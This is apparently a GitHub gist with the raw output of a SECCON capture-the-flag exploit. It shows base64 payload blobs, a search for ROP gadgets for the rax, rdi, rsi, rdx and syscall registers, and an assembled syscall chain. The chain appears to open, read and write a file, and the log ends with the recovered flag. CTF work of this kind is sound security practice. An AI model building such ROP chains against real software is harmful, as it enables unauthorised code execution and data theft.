    :    12dfe74c4
    : ffffffffec5d1f81
    :     3a96506f
    :     adb8e0dd
2QKAAAAAAAACAAAAAAAAABuGIlkAAAAAvMm6Ef/////0AIAAAAAAAAAAoAAAAAAAujipzQAAAADx0AfB/////5T5aTsAAAAAQif9oAAAAACSAYAAAAAAAAAAAAAAAAAAjyPdb/////8qQJ0CAAAAAGfxmagAAAAALwKAAAAAAAAAAAAAAAAAABh44Z4AAAAA/oZNCwEAAAAaLejQAAAAANwkfMYAAAAABgCAAAAAAADEdP4tAQAAAIEfXez/////b1CWOgAAAADd4LitAAAAAPMAgAAAAAAAujipzQAAAADx0AfB/////5T5aTsAAAAAQif9oAAAAADZAoAAAAAAAAAAAAAAAAAAG4YiWQAAAAC8yboR/////5IBgAAAAAAAAAGgAAAAAACPI91v/////ypAnQIAAAAAZ/GZqAAAAAAvAoAAAAAAAAABAAAAAAAAGHjhngAAAAD+hk0LAQAAABot6NAAAAAA3CR8xgAAAAAGAIAAAAAAAMR0/i0BAAAAgR9d7P////9vUJY6AAAAAN3guK0AAAAALgKAAAAAAAAYeOGeAAAAAP6GTQsBAAAAGi3o0AAAAADcJHzGAAAAANkCgAAAAAAAAQAAAAAAAAAbhiJZAAAAALzJuhH/////9ACAAAAAAAABAAAAAAAAALo4qc0AAAAA8dAHwf////+U+Wk7AAAAAEIn/aAAAAAAkgGAAAAAAAAAAaAAAAAAAI8j3W//////KkCdAgAAAABn8ZmoAAAAAAYAgAAAAAAAxHT+LQEAAACBH13s/////29QljoAAAAA3eC4rQAAAAA=

OK
stage
 5/5

encoded
9PT09PT09PReQV9Jge/nz39WSYHH20R8RUmB71lTCxFJgf/ORoIJdAL09EFcSYHEYONpUUmBxM5iBFxJgez2Cp4jSYH0fPr2bUmBxEadpXBJgfQQnewTSYH8scpyCXQG9PT09PT0w/T09PT09PT0UFpbSIHzg/byT0iB85gb6nlIgesZBqMpSIHr0BpfH0iBw5fCki1Iget2GLowSIHD/aiHQkiB63NihAxIgftwF1wVdAP09PTD9PT09PT0UF9BX0mB99DKLCZJgcdvnQ4aSYHv3LPdXEmB73dz8lBJgccgibR8SYH3gkeNB0mB73V/Kx9Jgf+xyKEpdAX09PT09EFfSYHHFZhtJ0mBx8vR7xxJgcdB9rB/SYH3P+3wFkmB97q37xtJge+zGFhwSYH3SHtEWEmB/3lOaEl0BPT09PTD9PT0DwVBXUmBxTprPFtJgf2floF0dAf09PT09PT0QVtJgfMOo9VYSYH7QKC6IXQF9PT09PRBX0mB71hEiFBJgcchNUU5SYH3e37RS0mB/7DHnGV0A/T09MP09PRYQV9JgceFOj0hSYHvrGAgJEmB9zZSvipJge8HQx8mSYH3Jqe6GEmBx559EgJJgf8bUs0kdAP09PRBXEmB9AABamVJgeyjZG9CSYHE4mZmZEmB9CWM7CRJgcQIMH95SYH0QijzakmB9JFpmRdJgfzDoNsTdAb09PT09PRBXkmB9jWHsAJJgcaOm3BHSYHG3wNzWUmBxiTpElVJgcZ81M8SSYHu/HXxFEmBxpnlK1lJgf4DixoidAT09PT0QVxJgfStmaBvSYHsrlNFCUmB/LbcFWV0AvT0QVtJgetz3H86SYHrr0mCdkmB8wX9XjFJgcNvxbQDSYHr1iFuO0mB87WLbD9JgfsQS4EmdAb09PT09PRBXUmBxfAr41NJgcVQ9RoLSYHFyZ5GX0mB9XjeeiVJgfWwFK8iSYH1XD79NUmB9XdsNm1Jgf2hphpBdAb09PT09PTD

[+] rsi gadgets found!
 gadget value is 0x2b912533
 gadget value is 0xffffffff3a3e04ef
[*] ret is found!
[+] rdx gadgets found!
 gadget value is 0x1d9aaab5
[*] ret is found!
[+] rdi gadgets found!
 gadget value is 0x4061dab8
 gadget value is 0xffffffffc88cb740
[*] ret is found!
[+] syscall gadgets found!
 gadget value is 0x19452b65
 gadget value is 0x796f034e
 gadget value is 0x4590c902
[*] ret is found!
[+] rax gadgets found!
 gadget value is 0x4d850a7b
 gadget value is 0xffffffffca8d3bee
 gadget value is 0xfffffffed7a9396c
 gadget value is 0x1fba9c9
 gadget value is 0x111fc062b
 gadget value is 0xffffffff5fbf7e39
[*] ret is found!
   rax:      80019d
   val:        2
    :     4d850a7b
    : ffffffffca8d3bee
    : fffffffed7a9396c
    :     1fba9c9
    :    111fc062b
    : ffffffff5fbf7e39
   rdi:      8000be
   val:      a00000
    :     4061dab8
    : ffffffffc88cb740
   rsi:      800008
   val:        0
    :     2b912533
    : ffffffff3a3e04ef
   rdx:      800070
   val:        0
    :     1d9aaab5
 syscall:      800144
    :     19452b65
    :     796f034e
    :     4590c902
   rdi:      8000bd
    :     4061dab8
    : ffffffffc88cb740
   rax:      80019d
   val:        0
    :     4d850a7b
    : ffffffffca8d3bee
    : fffffffed7a9396c
    :     1fba9c9
    :    111fc062b
    : ffffffff5fbf7e39
   rsi:      800008
   val:      a00100
    :     2b912533
    : ffffffff3a3e04ef
   rdx:      800070
   val:       100
    :     1d9aaab5
 syscall:      800144
    :     19452b65
    :     796f034e
    :     4590c902
   rdx:      80006f
    :     1d9aaab5
   rax:      80019d
   val:        1
    :     4d850a7b
    : ffffffffca8d3bee
    : fffffffed7a9396c
    :     1fba9c9
    :    111fc062b
    : ffffffff5fbf7e39
   rdi:      8000be
   val:        1
    :     4061dab8
    : ffffffffc88cb740
   rsi:      800008
   val:      a00100
    :     2b912533
    : ffffffff3a3e04ef
 syscall:      800144
    :     19452b65
    :     796f034e
    :     4590c902
nQGAAAAAAAACAAAAAAAAAHsKhU0AAAAA7juNyv////9sOanX/v///8mp+wEAAAAAKwb8EQEAAAA5fr9f/////74AgAAAAAAAAACgAAAAAAC42mFAAAAAAEC3jMj/////CACAAAAAAAAAAAAAAAAAADMlkSsAAAAA7wQ+Ov////9wAIAAAAAAAAAAAAAAAAAAtaqaHQAAAABEAYAAAAAAAGUrRRkAAAAATgNveQAAAAACyZBFAAAAAL0AgAAAAAAAuNphQAAAAABAt4zI/////50BgAAAAAAAAAAAAAAAAAB7CoVNAAAAAO47jcr/////bDmp1/7////JqfsBAAAAACsG/BEBAAAAOX6/X/////8IAIAAAAAAAAABoAAAAAAAMyWRKwAAAADvBD46/////3AAgAAAAAAAAAEAAAAAAAC1qpodAAAAAEQBgAAAAAAAZStFGQAAAABOA295AAAAAALJkEUAAAAAbwCAAAAAAAC1qpodAAAAAJ0BgAAAAAAAAQAAAAAAAAB7CoVNAAAAAO47jcr/////bDmp1/7////JqfsBAAAAACsG/BEBAAAAOX6/X/////++AIAAAAAAAAEAAAAAAAAAuNphQAAAAABAt4zI/////wgAgAAAAAAAAAGgAAAAAAAzJZErAAAAAO8EPjr/////RAGAAAAAAABlK0UZAAAAAE4Db3kAAAAAAsmQRQAAAAA=

OK
SECCON{d28d3afbf80463568d5f}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.